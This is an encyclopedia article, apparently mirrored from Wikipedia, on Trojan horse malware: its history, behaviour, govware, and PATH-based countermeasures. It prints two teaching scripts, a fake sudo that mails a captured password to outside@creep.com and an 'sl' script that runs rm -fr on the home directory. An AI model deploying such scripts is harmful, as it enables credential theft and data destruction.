Trojan horse (computing)

Last updated

In computing, a Trojan horse (or simply Trojan) is any malware that misleads users of its true intent by disguising itself as a standard program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. [1]

Contents

Trojans are generally spread by some form of social engineering. For example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on a fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. [2] Ransomware attacks are often carried out using a Trojan.

Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. [3]

Use of the term

It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both. [4]

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. [5]

It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", [6] subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics. [7] [8]

Behavior

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. [9]

In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software. [10] [11] Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer [12] and the German "state Trojan" nicknamed R2D2. [10] German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. [13]

Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. [14] BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. [15]

Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system. [16]

Linux sudo example

A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. [17] A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., /tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password.

#!/usr/bin/env bash# Turn off the character echo to the screen. sudo does this to prevent the user's password from appearing on screen when they type it in. stty-echo  # Prompt user for password and then read input. To disguise the nature of this malicious version, do this 3 times to imitate the behavior of sudo when a user enters the wrong password.prompt_count=1while[$prompt_count-le3];doecho-n"[sudo] password for $(whoami): "readpassword_input echosleep3# sudo will pause between repeated promptsprompt_count=$((prompt_count+1))done# Turn the character echo back on. sttyechoecho$password_input|mail-s"$(whoami)'s password"outside@creep.com  # Display sudo's actual error message and then delete self.echo"sudo: 3 incorrect password attempts" rm$0exit1# sudo returns 1 with a failed password attempt

To prevent a sudoTrojan horse, set the . entry in the PATH environment variable to be located at the tail end. [18] For example: PATH=/usr/local/bin:/usr/bin:..

Linux ls example

Having . somewhere in the PATH is convenient, but there is a catch. [19] Another example is the following malicious version of the Linux ls command. However, the filename is not ls; instead, it is sl. An attacker would place this script in a publicly writable directory (e.g., /tmp).

#!/usr/bin/env bash# Remove the user's home directory, then remove self. rm-fr~2>/dev/null rm$0

To prevent a malicious programmer from anticipating this common typing mistake:

  1. omit . in the PATH or
  2. alias sl=ls [a]

Notable examples

Private and governmental

Publicly available

Detected by security researchers

Capitalization

The computer term "Trojan horse" is derived from the legendary Trojan Horse of the ancient city of Troy. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use. [30] [31]

See also

Related Research Articles

Adware, often called advertising-supported software by its developers, is software that generates revenue by automatically displaying online advertisements in the user interface or on a screen presented during the installation process.

Malware is any software intentionally designed to cause disruption to a computer, server, client, or computer network, leak private information, gain unauthorized access to information or systems, deprive access to information, or which unknowingly interferes with the user's computer security and privacy. Researchers tend to classify malware into one or more sub-types.

<span class="mw-page-title-main">Timeline of computer viruses and worms</span> Computer malware timeline

This timeline of computer viruses and worms presents a chronological timeline of noteworthy computer viruses, computer worms, Trojan horses, similar malware, related research and events.

A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed and often masks its existence or the existence of other software. The term rootkit is a compound of "root" and the word "kit". The term "rootkit" has negative connotations through its association with malware.

A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device, or its embodiment. Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptosystems. From there it may be used to gain access to privileged information like passwords, corrupt or delete data on hard drives, or transfer information within autoschediastic networks.

Linux malware includes viruses, Trojans, worms and other types of malware that affect the Linux family of operating systems. Linux, Unix and other Unix-like computer operating systems are generally regarded as very well-protected against, but not immune to, computer viruses.

Creating a unified list of computer viruses is challenging due to inconsistent naming conventions. To combat computer viruses and other malicious software, many security advisory organizations and anti-virus software developers compile and publish virus lists. When a new virus appears, the rush begins to identify and understand it as well as develop appropriate counter-measures to stop its propagation. Along the way, a name is attached to the virus. Since anti-virus software compete partly based on how quickly they react to the new threat, they usually study and name the viruses independently. By the time the virus is identified, many names have been used to denote the same virus.

Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. It also writes to the Windows Security Log.

Mobile malware is malicious software that targets mobile phones or wireless-enabled Personal digital assistants (PDA), by causing the collapse of the system and loss or leakage of confidential information. As wireless phones and PDA networks have become more and more common and have grown in complexity, it has become increasingly difficult to ensure their safety and security against electronic attacks in the form of viruses or other malware.

Sub7, or SubSeven or Sub7Server, is a Trojan horse - more specifically a Remote Trojan Horse - program originally released in February 1999. Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". As of June 2021, the development of Sub7 is being continued.

Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. It is a form of scareware that manipulates users through fear, and a form of ransomware. Rogue security software has been a serious security threat in desktop computing since 2008. An early example that gained infamy was SpySheriff and its clones, such as Nava Shield.

A number of computer operating systems employ security features to help prevent malicious software from gaining sufficient privileges to compromise the computer system. Operating systems lacking such features, such as DOS, Windows implementations prior to Windows NT, CP/M-80, and all Mac operating systems prior to Mac OS X, had only one category of user who was allowed to do anything. With separate execution contexts it is possible for multiple users to store private files, for multiple users to use a computer at the same time, to protect the system against malicious users, and to protect the system against malicious programs. The first multi-user secure system was Multics, which began development in the 1960s; it wasn't until UNIX, BSD, Linux, and NT in the late 80s and early 90s that multi-tasking security contexts were brought to x86 consumer machines.

<span class="mw-page-title-main">Computer virus</span> Computer program that modifies other programs to replicate itself and spread

A computer virus is a type of malware that, when executed, replicates itself by modifying other computer programs and inserting its own code into those programs. If this replication succeeds, the affected areas are then said to be "infected" with a computer virus, a metaphor derived from biological viruses.

Gumblar is a malicious JavaScript trojan horse file that redirects a user's Google searches, and then installs rogue security software. Also known as Troj/JSRedir-R this botnet first appeared in 2009.

<span class="mw-page-title-main">Genieo</span> Israeli company specializing in Mac malware

Genieo Innovation is an Israeli company, specializing in unwanted software which includes advertising and user tracking software, commonly referred to as a potentially unwanted program, adware, privacy-invasive software, grayware, or malware. They are best known for Genieo, an application of this type. They also own and operate InstallMac which distributes additional 'optional' search modifying software with other applications. In 2014, Genieo Innovation was acquired for $34 million by Somoto, another company which "bundles legitimate applications with offers for additional third party applications that may be unwanted by the user". This sector of the Israeli software industry is frequently referred to as Download Valley.

Mobile security, or mobile device security, is the protection of smartphones, tablets, and laptops from threats associated with wireless computing. It has become increasingly important in mobile computing. The security of personal and business information now stored on smartphones is of particular concern.

Slenfbot is the classification for a family of malicious software (malware), which infects files on Microsoft Windows systems. Slenfbot was first discovered in 2007 and, since then, numerous variants have followed; each with slightly different characteristics and new additions to the worm's payload, such as the ability to provide the attacker with unauthorized access to the compromised host. Slenfbot primarily spreads by luring users to follow links to websites, which contain a malicious payload. Slenfbot propagates via instant messaging applications, removable drives and/or the local network via network shares. The code for Slenfbot appears to be closely managed, which may provide attribution to a single group and/or indicate that a large portion of the code is shared amongst multiple groups. The inclusion of other malware families and variants as well as its own continuous evolution, makes Slenfbot a highly effective downloader with a propensity to cause even more damage to compromised systems.

A potentially unwanted program (PUP) or potentially unwanted application (PUA) is software that a user may perceive as unwanted or unnecessary. It is used as a subjective tagging criterion by security and parental control products. Such software may use an implementation that can compromise privacy or weaken the computer's security. Companies often bundle a wanted program download with a wrapper application and may offer to install an unwanted application, and in some cases without providing a clear opt-out method. Antivirus companies define the software bundled as potentially unwanted programs which can include software that displays intrusive advertising (adware), or tracks the user's Internet usage to sell information to advertisers (spyware), injects its own advertising into web pages that a user looks at, or uses premium SMS services to rack up charges for the user. A growing number of open-source software projects have expressed dismay at third-party websites wrapping their downloads with unwanted bundles, without the project's knowledge or consent. Nearly every third-party free download site bundles their downloads with potentially unwanted software. The practice is widely considered unethical because it violates the security interests of users without their informed consent. Some unwanted software bundles install a root certificate on a user's device, which allows hackers to intercept private data such as banking details, without a browser giving security warnings. The United States Department of Homeland Security has advised removing an insecure root certificate, because they make computers vulnerable to serious cyberattacks. Software developers and security experts recommend that people always download the latest version from the official project website, or a trusted package manager or app store.

Shedun is a family of malware software targeting the Android operating system first identified in late 2015 by mobile security company Lookout, affecting roughly 20,000 popular Android applications. Lookout claimed the HummingBad malware was also a part of the Shedun family, however, these claims were refuted.

macOS malware includes viruses, trojan horses, worms and other types of malware that affect macOS, Apple's current operating system for Macintosh computers. macOS is said to rarely suffer malware or virus attacks, and has been considered less vulnerable than Windows. There is a frequent release of system software updates to resolve vulnerabilities. Utilities are also available to find and remove malware.

References

  1. "Trojan Horse Definition" . Retrieved April 5, 2012. Greek soldiers, unable to penetrate the defenses of the city of Troy during a years-long war, presented the city with a peace offering of a large wooden horse.
  2. "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  3. "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  4. Thompson, Ken; Ritchie, Dennis M. "Unix Programmer's Manual, November 3, 1971" (PDF). p. 5. Retrieved March 28, 2020. Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other's files.
  5. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II, archived from the original (PDF) on July 9, 2011, retrieved December 24, 2017
  6. Ken Thompson (1984). "Reflection on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi: 10.1145/358198.358210 ..
  7. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  8. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  9. Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute . Retrieved May 10, 2021.
  10. 1 2 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  11. "Häufig gestellte Fragen (Frequently Asked Questions)". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  12. Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld . Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  13. "German federal police use trojan virus to evade phone encryption". DW . Retrieved April 14, 2018.
  14. "BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends". BitDefender . Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  15. Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  16. Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer A. B.; Ismail, Nurul H. A.; Zraqou, Jamal; Ali, Abdulla M. F. Al (December 20, 2022). "Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning". International Journal of Interactive Mobile Technologies. 16 (24): 81–106. doi: 10.3991/ijim.v16i24.35763 . ISSN   1865-7923.
  17. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN   0-8104-6267-2.
  18. Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 43. ISBN   0-8104-6267-2. The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.
  19. "What's wrong with having '.' in your $PATH?". Penn Engineering. Retrieved November 28, 2023. [I]f you're a clumsy typist and some day type "sl -l" instead of "ls -l", you run the risk of running "./sl", if there is one. Some "clever" programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories. Beware.
  20. Seth, Kulakow (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute . Retrieved May 10, 2021.
  21. "Mega-Panzer". SourceForge. September 21, 2016.
  22. "Mini-Panzer". SourceForge. September 18, 2016.
  23. "What is Sova virus?". India Today. September 16, 2022.
  24. "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
  25. Neal, Dave (November 20, 2015). "Shedun trojan adware is hitting the Android Accessibility Service". The Inquirer . Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.
  26. "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog". Archived from the original on February 19, 2017. Retrieved April 8, 2016.
  27. "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
  28. Times, Tech (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
  29. "Android adware can install itself even when users explicitly reject it". November 19, 2015.
  30. "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
  31. "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.

Notes

  1. Place the alias statement in /etc/profile
This page is based on this Wikipedia article
Text is available under the CC BY-SA 4.0 license; additional terms may apply.
Images, videos and audio are available under their respective licenses.